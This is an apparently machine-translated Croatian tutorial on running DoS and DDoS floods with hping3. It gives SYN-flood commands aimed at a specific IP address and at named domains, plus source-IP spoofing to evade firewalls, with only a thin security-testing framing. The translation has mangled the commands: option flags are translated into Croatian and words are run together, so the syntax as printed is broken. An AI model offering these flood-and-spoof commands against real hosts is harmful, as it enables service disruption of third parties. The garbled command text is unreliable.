hping3 poplava ddos

Hping3 Flood Ddos



Ovaj vodič se fokusira na DDOS (Distributed Denial of Service) napade pomoću alata hping3. Ako ste već upoznati s napadima DOS -a (uskraćivanja usluge) i DDOS -a, možete nastaviti čitati iz hping3 praktičnih uputa, inače se preporučuje da saznate kako ti napadi funkcioniraju.

DOS napadi


Napad uskraćivanjem usluge (DOS) vrlo je jednostavna tehnika za uskraćivanje pristupa uslugama (zato se i naziva napadom uskraćivanja usluge). Ovaj se napad sastoji od preopterećenja cilja velikim paketima ili velikom količinom njih.







Iako je ovaj napad vrlo jednostavan za izvođenje, ne ugrožava informacije ili privatnost mete, nije prodoran napad i ima za cilj samo spriječiti pristup meti.
Slanjem količine paketa cilj ne može obraditi napadače i spriječiti poslužitelj u posluživanju legitimnih korisnika.



DOS napadi se izvode s jednog uređaja, stoga ih je lako zaustaviti blokiranjem napadačeve IP adrese, ali napadač može promijeniti pa čak i prevariti (klonirati) ciljnu IP adresu, ali vatrozidima nije teško nositi se s takvim napadima , suprotno onome što se događa s DDOS napadima.



DDOS napadi

Napad distribuiranog uskraćivanja usluge (DDOS) sličan je napadu na DOS, ali se izvodi s različitih čvorova (ili različitih napadača) istovremeno. Uobičajeno DDOS napade izvode botneti. Botneti su automatizirane skripte ili programi koji inficiraju računala kako bi izvršili automatizirani zadatak (u ovom slučaju DDOS napad). Haker može stvoriti botnet i zaraziti mnoga računala s kojih će botneti pokrenuti DOS napade. Činjenica da mnogi botneti pucaju istovremeno pretvara DOS napad u DDOS napad (zato se i naziva distribuiranim).





Naravno, postoje iznimke u kojima su DDOS napade izvodili pravi ljudski napadači, na primjer, hakerska skupina Anonymous, koju je integriralo na tisuće ljudi diljem svijeta, vrlo je često koristila ovu tehniku ​​zbog jednostavne implementacije (bili su potrebni samo dobrovoljci koji su dijelili njihov uzrok), tako je, na primjer, Anonymous ostavio Gadafijevu libijsku vladu potpuno isključenom tijekom invazije, libijska država ostala je bez obrane pred tisućama napadača iz cijelog svijeta.

Ovu vrstu napada, kada se izvode s mnogo različitih čvorova, izuzetno je teško spriječiti i zaustaviti te obično zahtijevaju poseban hardver za rješavanje, to je zato što vatrozidi i obrambene aplikacije nisu spremni za obračun s tisućama napadača istovremeno. To nije slučaj s hping3, većina napada izvedenih putem ovog alata bit će blokirana obrambenim uređajima ili softverom, no ipak je korisna u lokalnim mrežama ili protiv slabo zaštićenih ciljeva.



O hping3

Alat hping3 omogućuje slanje manipuliranih paketa. Ovaj alat omogućuje vam kontrolu veličine, količine i fragmentacije paketa kako biste preopteretili cilj i zaobišli ili napadali vatrozide. Hping3 može biti koristan u svrhe testiranja sigurnosti ili sposobnosti, pomoću njega možete testirati učinkovitost vatrozida i može li poslužitelj rukovati velikom količinom paketa. U nastavku ćete pronaći upute o tome kako koristiti hping3 u svrhe sigurnosnog testiranja.

Za početak s DDOS napadima pomoću hping3:

Na Debian i temeljenim Linux distribucijama možete instalirati hping3 pokretanjem:

#prikladaninstaliratihping3-i

Jednostavan DOS (ne DDOS) napad bio bi:

#sudohping3-S --poplava -V -str 80170.155.9.185

Gdje:
sudo: daje potrebne privilegije za pokretanje hping3.
hping3:
poziva hping3 program.
-S: specificira SYN pakete.
-poplava: pucajte prema vlastitom nahođenju, odgovori će se zanemariti (zato se odgovori neće prikazivati), a paketi će se slati što je brže moguće.
-V: Opširnost.
-p 80: port 80, ovaj broj možete zamijeniti za uslugu koju želite napasti.
170.155.9.185: ciljni IP.

Poplava pomoću SYN paketa prema priključku 80:

Sljedeći primjer prikazuje SYN napad na lacampora.org:

#sudohping3 lacampora.org-q -n -d 120 -S -str 80 --poplava --rand-source

Gdje:
Lacampora.org: je meta
-q: kratki izlaz
-n: prikaži ciljni IP umjesto hosta.
-d 120: postavite veličinu paketa
-izvor i izvor: sakriti IP adresu.

Sljedeći primjer prikazuje drugi mogući primjer poplave:

SYN poplava protiv luke 80:

#sudohping3--rand-sourceivan.com-S -q -str 80 --poplava

Pomoću hping3 također možete napasti svoje ciljeve lažnim IP -om, kako biste zaobišli vatrozid, možete čak i sami klonirati svoj ciljani IP ili bilo koju dopuštenu adresu koju možda znate (to možete postići, na primjer, pomoću Nmapa ili njuškala da biste slušali uspostavljene veze).

Sintaksa bi bila sljedeća:

#sudohping3-do <LAŽNI IP> <cilj> -S -q -str 80 --brže -c2

U ovom praktičnom primjeru napad bi izgledao:

#sudohping3-do190.0.175.100 190.0.175.100-S -q -str 80 --brže -c2

Nadam se da vam je ovaj vodič o hping3 bio koristan. Slijedite LinuxHint za više savjeta i ažuriranja o Linuxu i umrežavanju.